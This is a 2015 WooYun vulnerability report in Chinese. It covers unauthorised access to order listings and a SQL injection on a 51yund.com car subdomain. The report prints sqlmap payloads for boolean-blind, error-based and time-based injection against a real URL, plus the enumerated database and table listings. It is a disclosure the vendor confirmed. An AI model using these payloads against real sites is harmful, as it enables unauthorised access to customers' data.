当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096815

漏洞标题:悦动圈某分站订单信息未授权访问+SQL注入(可跨库)

相关厂商:51yund.com

漏洞作者: Ton7BrEak

提交时间:2015-02-11 16:49

修复时间:2015-03-28 16:50

公开时间:2015-03-28 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-12: 厂商已经确认,细节仅向厂商公开
2015-02-22: 细节向核心白帽子及相关领域专家公开
2015-03-04: 细节向普通白帽子公开
2015-03-14: 细节向实习白帽子公开
2015-03-28: 细节向公众公开

简要描述:

接着之前的漏洞继续深入~

详细说明:

1、未授权访问
http://car.51yund.com/mobile/get_all_nopay_order.php

001.jpg


http://car.51yund.com/mobile/get_all_pay_order.php

002.jpg


2、此站某处注入点,经过检测发现这个站没有做SQL注入防御,很多地方都可以爆出数据库信息。
http://car.51yund.com/mobile/order_info.php?order_id=2755

Place: GET
Parameter: order_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: order_id=2755 AND 1189=1189
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: order_id=2755 AND (SELECT 8189 FROM(SELECT COUNT(*),CONCAT(0x3a7669613a,(SELECT (CASE W
HEN (8189=8189) THEN 1 ELSE 0 END)),0x3a6f6b773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTE
R_SETS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMI
TER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: order_id=2755 AND SLEEP(5)
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

漏洞证明:

一、数据库

available databases [14]:
[*] cacti
[*] information_schema
[*] mycar
[*] mycar_test
[*] mysql
[*] performance_schema
[*] question
[*] spilder_dianping
[*] sport
[*] sport_cms
[*] sport_test
[*] test
[*] xyy_db
[*] yd_sns


2、某个库的数据

Database: cacti
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| graph_templates_item | 328 |
| graph_template_input_defs | 257 |
| data_input_data | 243 |
| data_template_data_rra | 224 |
| colors | 101 |
| data_template_rrd | 77 |
| graph_template_input | 77 |
| snmp_query_graph_rrd_sv | 59 |
| data_template_data | 56 |
| data_input_fields | 46 |
| data_template | 41 |
| graph_templates_graph | 41 |
| snmp_query_graph_sv | 40 |
| snmp_query_graph_rrd | 39 |
| host_snmp_cache | 36 |
| graph_templates | 33 |
| snmp_query_graph | 19 |
| user_auth_realm | 18 |
| poller_item | 17 |
| cdef_items | 16 |
| data_local | 15 |
| host_template_graph | 14 |
| settings | 14 |
| host_template_snmp_query | 13 |
| data_input | 12 |
| user_log | 11 |
| rra_cf | 10 |
| graph_local | 8 |
| snmp_query | 8 |
| host_template | 7 |
| cdef | 6 |
| rra | 5 |
| host_graph | 4 |
| graph_templates_gprint | 3 |
| host | 2 |
| host_snmp_query | 2 |
| plugin_hooks | 2 |
| user_auth | 2 |
| `version` | 1 |
| graph_tree | 1 |
| graph_tree_items | 1 |
| plugin_realms | 1 |
| poller_reindex | 1 |
| poller_time | 1 |
+---------------------------+---------+

修复方案:

0.0

版权声明:转载请注明来源 Ton7BrEak@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-12 14:54

厂商回复:

程序员已被罚跪在键盘上敲代码~~

最新状态:

暂无